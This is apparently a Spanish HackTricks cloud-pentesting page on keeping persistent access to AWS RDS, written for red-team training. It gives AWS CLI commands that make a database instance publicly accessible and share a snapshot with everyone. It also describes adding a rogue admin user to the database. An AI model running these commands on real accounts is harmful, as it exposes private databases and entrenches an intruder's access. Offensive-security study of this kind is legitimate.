AWS - RDS Persistencia

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

RDS

Para más información, consulta:

AWS - Relational Database (RDS) Enum

Hacer la instancia accesible públicamente: rds:ModifyDBInstance

Un atacante con este permiso puede modificar una instancia RDS existente para habilitar el acceso público.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Crear un usuario admin dentro de la DB

Un atacante podría simplemente crear un usuario dentro de la DB de modo que, incluso si se modifica la contraseña del usuario master, él no pierde el acceso a la base de datos.

Hacer público el snapshot

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks